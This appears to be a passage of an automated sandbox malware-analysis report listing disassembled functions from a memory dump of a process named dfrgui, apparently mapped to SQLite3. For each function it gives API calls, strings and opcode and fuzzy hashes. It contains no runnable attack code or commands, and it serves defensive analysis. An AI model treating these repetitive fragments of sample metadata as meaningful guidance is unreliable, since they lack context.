                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                  • String ID: winDelete
                                  • API String ID: 3336177498-3936022152
                                  • Opcode ID: 756453012e03aa2d1c7cddd2834e3f4f86bf9e80ee8c2bff39c0119a48baf332
                                  • Instruction ID: 92fe3e7a3a3fcca52e3f8a0be4d162aecf04f5e09f6a9b3cf71736c4c8e4bb13
                                  • Opcode Fuzzy Hash: 756453012e03aa2d1c7cddd2834e3f4f86bf9e80ee8c2bff39c0119a48baf332
                                  • Instruction Fuzzy Hash: B731B670A086868BFF015FE5C5A0A5E7AB5EF4E358F70C719EC5097384D734C8828B92
                                  Function 61E89F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: Virtual$ProtectQuery
                                  • String ID: @
                                  • API String ID: 1027372294-2766056989
                                  • Opcode ID: eafeafb4ccc9d04e12b93a645499c82aef18d6a707cb809083bcb403d8da0804
                                  • Instruction ID: 69e38bb49d745cba92c23a08cf0c190fefaaa2e1434ea224b8a21b48753cd00a
                                  • Opcode Fuzzy Hash: eafeafb4ccc9d04e12b93a645499c82aef18d6a707cb809083bcb403d8da0804
                                  • Instruction Fuzzy Hash: C4318DB2905B018FD790DF69C58461ABBE0FB84354F69C91DE95D873A0E334E885CB92
                                  Function 61E03DDC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_stricmp.SQLITE3(00000000,?,?,61E5E5C6), ref: 61E03E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_stricmp
                                  • String ID: sqlite_master$sqlite_temp_master
                                  • API String ID: 912767213-3047539776
                                  • Opcode ID: 0c073ee5c96dcba8c92df61a5250414ccf3addf8a1f90108f50615dd7fcde0c1
                                  • Instruction ID: 338e4502d5418fe0ef639f3e4b1d2a0bc40da92462bfd84696022d1b450fb1d3
                                  • Opcode Fuzzy Hash: 0c073ee5c96dcba8c92df61a5250414ccf3addf8a1f90108f50615dd7fcde0c1
                                  • Instruction Fuzzy Hash: 22118272A003128FAB00DFADC98095BBBF4FF88349B258569EC24DB305D370D92287A1
                                  Function 61E1EAA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E1EABA
                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E1EAC6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                  • String ID:
                                  • API String ID: 3265351223-3916222277
                                  • Opcode ID: 04c0678c264c8c12a0e7256b8ba52233778c730497580e5ad6c8a8653444e905
                                  • Instruction ID: 6a82c2ab7322a0c9b1f8ddee1e035033694e4b22e646b1831d8313ec58ddb9a5
                                  • Opcode Fuzzy Hash: 04c0678c264c8c12a0e7256b8ba52233778c730497580e5ad6c8a8653444e905
                                  • Instruction Fuzzy Hash: E211A5306086858BDF159FA9D4C16567FF4FF59318F24849CE8858B34AD730C9A0C7A2
                                  Function 61E2619D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E261E2
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2621E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                  • String ID: ,a
                                  • API String ID: 1477753154-370703091
                                  • Opcode ID: 6be451845af8069584cd5c24c7357e13048ff224aa3cca023aabb70a8888d18f
                                  • Instruction ID: 56986a8078eb7d98f1ece1477e5ba365d9eae86e60eef3cf59c9ae7981711a75
                                  • Opcode Fuzzy Hash: 6be451845af8069584cd5c24c7357e13048ff224aa3cca023aabb70a8888d18f
                                  • Instruction Fuzzy Hash: A411C0B5A00B059BDF04DF5AE480B9ABBB0FB8A315F14852ADD085B300E335E491CBD1
                                  Function 61E16D11 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,61E16D7F), ref: 61E16D29
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_enter
                                  • String ID: `va$`va
                                  • API String ID: 3053899952-3405698608
                                  • Opcode ID: 03c3b3a6c19e1b840c52ce20da285bc41dcea863ccef40fd75c6185c6a7c3d07
                                  • Instruction ID: fa04bb672ac3a27eb04f6b0105f89a876318f2672f961cff04bd179322e1a33f
                                  • Opcode Fuzzy Hash: 03c3b3a6c19e1b840c52ce20da285bc41dcea863ccef40fd75c6185c6a7c3d07
                                  • Instruction Fuzzy Hash: B0F0B47070C2845BEB106EAD88C2B2177D4A74C218FE5C879E555CF749D660DC908791